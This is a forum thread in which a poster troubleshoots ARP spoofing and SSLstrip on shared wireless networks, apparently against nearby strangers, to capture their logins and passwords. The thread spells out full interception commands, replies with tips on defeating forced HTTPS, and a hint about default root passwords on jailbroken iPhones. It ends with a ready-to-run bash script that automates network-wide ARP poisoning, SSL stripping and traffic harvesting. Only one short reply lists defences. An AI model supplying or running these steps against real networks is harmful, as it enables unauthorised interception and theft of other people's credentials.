What On Earth Is Going On With This Arp Spoofing / Ssl Strip Situation?

[michael_kent123]

I am having some interesting experiences while ARPspoofing and using SSLStrip. There's a couple of things I just cannot make sense of. I have watched the Hak 5 videos about this topic which is why I hope that this forum is an appropriate place to post. I'm not doing this for malicious purposes - I'm just curious that's all and have spent many hours trying to figure out my problem with zero success.

Here's what I do.

Connect to the network.

su root

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan0 192.168.x.x [based on route -n]

sslstrip -a -l 10000 [the -a options logs all traffic not just POST requests]

This often works fine but sometimes there are problems.

There are two issues (which may or may not be interconnected).

First:

I ARPspoof the network as described above. However, my Wireshark logs do not reveal that any HTTP, TCP, or TLS traffic is going through me. I obviously should be the MITM. I can see that I am telling everyone that I am the router with my ARP commands. But no content is going through me. I can observe lots of people nearby in the room doing various things that would generate traffic. And I am using the -a option so everything should be logged. But the log file stays at 0 bytes.

Why is nothing going through me? I could understand if the network was empty but it isn't as within a few minutes the Wireshark file has tens of thousands of enteries.

Second:

This is more common than the above. The Wireshark logs do show DNS, HTTP, TCP, and TLS traffic but, once again, the log file stays at 0 bytes. I can see that, this time, traffic is flowing through me and I really do appear to be a MITM. But, in reality, no traffic is ever being recorded.

The point is that I am forcing traffic through me so the ARP commands are effective. But nothing is saved.

I have the Wireshark logs so if anyone has a specific question I can certainly refer to them.

Many thanks - I am so confused about this and would really like to learn.

[digip]

Whats the site you are trying to SSL strip? Some sites, force SSL only, even when trying to run SSL strip, they will reject HTTP traffic. Also, make sure you start wireshark with sudo(I see you su root above, but if thats only for the arpspoof terminal, your second terminal needs to su root or sudo wireshark too I beleive)

Can you screen cap everything you are doing, maybe someone watching can spot where its going wrong or a step missed.

[Infiltrator]

What wireless adapter are you using? Also, are you using VM or just a physical machine?

[michael_kent123]

I am trying to log all traffic not a specifc site.

With arpspoof -i wlan0 [iP address of router] I should be the MITM for all traffic on the network which uses that router.

I always use sudo wireshark but all traffic is saved with sslstrip and the -a option.

I am using a physcial machine.

The wireless adapter (wlan0) is Atheros Communications Inc. AR928X Wireless Network Adapter (PCI-Express) (rev 01).

I have been successful on many occasions so I do not see how the issue is at my end.

Thanks again!

[digip]

Are you saving wireshark to disk on the fly and buffering logs, or just running in real time? You need to cancle the logging and then save the pcap, or change the logging in wireshark to buffer to files every so many megabytes and it will generate pcaps on the go.

[michael_kent123]

I do not think I have explained myself well.

The issue is nothing to do with Wireshark. I am only using Wireshark to see what traffic is going through me when I am MITM.

sslstrip (http://www.thoughtcrime.org/software/sslstrip/) should log everything when I use its -a option.

Often it works but - in the two experiences I provided in the original post - it will not log anything even though I am MITM.

[digip]

double check all the files and steps, make sure the port foward file, doesn;t contain 11 or 111 for example ;)

[Infiltrator]

This is just a suggestion, it may or may not work but have you tried putting your wireless card mode into monitor, instead of managed?

if you type iwconfig at the terminal, it should say if the card is in managed or monitor mode.

Typing this command at the terminal will temporary change your card current mode into the chosen one.

iwconfig wlan0 mode monitor
[/CODE]

[michael_kent123]

Some updates - and thanks for all the advice:

I tried again on a network where it looks as if traffic (HTTP, SSL, etc) is flowing through me but nothing gets saved by SSL Strip. According to this article (http://torpedo48.it/hacking-tutorials/man-in-the-middle-attacks-mitm/how-to-sniff-all-network-traffic-using-https-stripping) you can view POST data (secure and not secure) in Wireshark.

It says: "Login forms usually use the POST request method to send credentials to servers; using this filter you'll be able to find out all the credentials your victims inserted in the sites they visited (even the secured ones, thanks to Sslstrip!): "http.request.method == "POST""."

The idea is, as I understand it, that SSL Strip will work on the MITM computer before the packets are saved by Wireshark.

I tried the http.request,method == "POST" on a Wireshark file with 40,000 entries but found nothing.

Interestingly, the sslstrip.log file did contain entries like this:

2012-10-02 14:22:55,593 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'loginsvc.world.com' not found: [Errno -5] No address associated with hostname.

And:

012-10-02 14:22:28,068 Resolving host: www.whatever.org.uk

2012-10-02 14:22:28,069 Host not cached.

This is all the log showed with the -a (all) option which normally would record a wide range of HTTP traffic. Perhaps these errors reveal something?

Monitor mode:

I used: sudo iwconfig wlan0 mode monitor

However, I always got:

Error for wireless request "Set Mode" (8B06) :

SET failed on device wlan0 ; Device or resource busy.

I'll try it next time with airmon-ng.

I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.

[digip]

Its possible some sites, are defined to not run on http, and as such, only pass data if https is working, so you might not see anything, but try testing with multiple different SSL sites. Also, maybe post all commands from start to finish, possible something is mis-configured, or just broken. As for monitor mode, MITM works in windows without it, so don't think that will have anything to do with it. If anything you want it in managed mode and promisc off.

Edited October 2, 2012 by digip

[Infiltrator]

I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.

Digip got a point, you have to make sure the website in question, is not enforcing the use of HTTP(s). Because if it, SSLstrip won't help much. I would advise running SSLstrip against some websites, that uses HTTP(s) to see what kind of results, you get.

[michael_kent123]

I don't undertand the last two comments.

The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim).

The sslstrip.log file normally shows POST and SECURE POST logins and passwords.

I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark.

Or did I misunderstand what the last two posters were saying?

[Infiltrator]

I don't undertand the last two comments.

The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim).

The sslstrip.log file normally shows POST and SECURE POST logins and passwords.

I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark.

Or did I misunderstand what the last two posters were saying?

There are certain websites that are programmed to explicitly use HTTPS only. If the connection is somehow reverted to HTTP, the server will either terminate the connection or refuse to work on HTTP.

This could explain why, SSLstrip in your case is failing to log any logins and passwords.

On the other hand, there are websites, that even though they use HTTP(s), they could still use HTTP, and that's where in certain situations SSLstrip is able to log the logins and passwords for you.

Edited October 4, 2012 by Infiltrator

[michael_kent123]

On a related topic.

What is the difference between 192.168.1.1 (which is the router address) and 192.168.1.255 (which is the broadcast address).

For example, I have always used:

arpspoof -i wlan0 192.168.1.1

However, at least one commentator on the Backtrack forum suggests that, to spoof the entire network, one should use the broadcast address.

What would be the difference between arpspoffing these two IPs?

Thanks.

[digip]

I don;t know that you can use the broadcast address, but that address also changes depending on the actual subnet mask in use, so if your subnet mask is 255.255.255.0 then yes, 192.168.1.255 is the broadcast address, but typically, you poison the router, and the target machine, not the broadcast address, and I'm not sure tools even let you use the broadcast. I know cain, only lets you do the router, and the nodes on the system, and not the broadcast address. Reason being, cain does arp cache poisoning, which is essentially what most ARP attacks are doing anyway. You want to tell the router, you are the target and then tell the target you are the router, so traffic for the two, flows through you and you can then sniff that traffic. SSL strip introduces the ability to force it to http vs https, but some sites, again, force SSL.

Switches make this harder, as where wireless, tends to make it much easier to poison. Distance however plays a roll in successful MITM over wireless though too as well as speed, but with wired, at some point the devices tend to learn each other again if the program doing to poisoning isn't resending spoofed MAC address data to the two nodes you're trying to sit between, and can foul up arp tables and cause the router to stop responding to both of you. Especially on fast wired equipment. Also, trying to take over and spoof every connection on a network, depending on the size, wouldn't be wise. If on a corporate network and say a class A subnet, you would be the main bottleneck and bring things down in a jiffy if say a few thousand nodes tried flowing through your one NIC.

As for why the SSL strip part isn't working, can't specifically say other than my guess is the site you are hitting, forces HTTPS or has a cookie setting the user set under their profile, like say Twitter, to only allow that user to use SSL, which will keep redirecting them back to HTTPS once they are logged in. Gettiing their cookies through sidejacking might be possible, if you can force them to log out and have to re-authenticate, but you'd have to introduce a logout link and make them somehow click it, forcing them to have to sign back in, and usually, they login over http, and once signed in, it checks if they wanted to always be on https, and then redirects them. Hotmail(or outlook now) and I think even Facebook, now force SSL across their sites, and even Gmail I think does too now, so just have to try some other sites, see what happens. if you can do it on one site, but not another, its probably because of the site forcing SSL and ignoring http traffic, but if it works no where at all, then thats another story.

There is also a tool, I forget the name of it, might even be part of SSL strip, that allows you to spoof certificates too, so you can snoop ssl traffic, but that requires the end user to accept the certificate(which most modern browsers should prompt them something is wrong or even block access if the certs don't match) or the browser would have to be setup to ignore certificate errors, which most of the time, requires users to disable that, and isn't something on by default to ignore certificate errors.

[michael_kent123]

Thanks so much!

New question:

If I am the MITM and run arp -a in Ubuntu which reveals the results below then I think this signifies that all these participants are going through me. Correct?

iPad-von-Resi.local (10.129.50.103) at b8:ff:61:0c:f1:29 [ether] on wlan0

Leonids-iPod.local (10.129.50.105) at <incomplete> on wlan0

? (10.129.50.112) at <incomplete> on wlan0

Sams-iPad-2.local (10.129.50.121) at 34:51:c9:c0:b2:3b [ether] on wlan0

Becky-Turners-iPhone.local (10.129.50.100) at 5c:95:ae:6a:aa:d5 [ether] on wlan0

? (10.129.50.97) at 44:d3:ca:91:2a:48 [ether] on wlan0

? (10.129.50.106) at <incomplete> on wlan0

? (10.129.50.102) at 8c:fa:ba:95:ba:ef [ether] on wlan0

? (10.129.50.110) at c0:9f:42:79:7b:a3 [ether] on wlan0

? (10.129.50.111) at 68:a3:c4:6a:f3:26 [ether] on wlan0

Two points:

Why are some incomplete?

I also suspect that iPads and iPhones act abnormally and - assuming their owners use 3G rather than wireless - this means that they are not really going through me. Does this sound OK?

Thanks again!

[digip]

I actually tried arpspoofing an iphone once and I think it failed over to the carrier when I tried it, so there might be something built into apple devices smart enough to know when a gateway changes IP and MAC for the same IP, it blocks it. No clue on the "incomplete" but maybe read the documentation on the tool, might have an answer for that. On a side note, all iphones and ipads have the same shell password of "alpine". If any of those devices we're jailbroken, and they never bothered to run passwd afterwards, they are fucked. Wouldn't suggest SSH'ing into devices you don't own either, but if you're already arpspoofing someones network, I gather that doesn't mean a whole lot..lol

Edited October 10, 2012 by digip

[michael_kent123]

I think I may be able to explain the 'what' of the situation if not the 'why'

It is based on the 'arp -a' command.

I ARPspoof as follows:

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan0 [iP address of router]

sslstrip -l 10000 [to log POST requests]

If I issue 'arp -a' and get something like this...

? (10.108.0.6) at 00:50:50:d7:60:24 [ether] on wlan0

...then I know that no traffic is routed through me since the answer shows my connection to the router.

However, if 'arp -a' provides something like this...

? (192.168.4.18) at 00:12:0b:32:1a:04 [ether] on wlan0

? (192.168.4.32) at 00:12:0d:30:18:e4 [ether] on wlan0

? (192.168.1.62) at 71:56:82:88:e8:f2 [ether] on wlan0

? (192.168.4.11) at 00:12:0a:30:20:d1 [ether] on wlan0

...then I know that ARPspoofing has been successful and I am the MITM.

So, my question is: how do the owners of some networks prevent ARPspoofing commands from working?

All of the networks where I failed to ARPspoof were 10.xxx.xxx.xxx networks. Yet I have been successful now and again on 10.xxx.xxx.xxx networks. All failures are 10.xxx.xxx.xxx networks but not all 10.xxx.xxx.xxx networks are failures.

Any ideas how network owners can prevent ARPspoofing Thanks!

[michael_kent123]

bump!

[bobbyb1980]

Any ideas how network owners can prevent ARPspoofing Thanks!

- AP isolation at the router.

- A local/network script or antivirus to monitor arp-tables running on your os

- Browser's can check for SSL

- IPS could have various LAN defences, making sure 192.168.1.1 is indeed itself, etc etc

[vector]

ok if you want this to be really easy. make sure you have , ettercap (not ettercap-gtk, just the text only version), urlsnarf, and tcpxtract, installed.

heres a handy little script that you can just run as root that will setup everything for you. of course you will have to fill in a few blanks that it will ask for, such as gateway/target ip addy, and wether you want to run wireshark and or extract images when your session is done.

#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
[/CODE]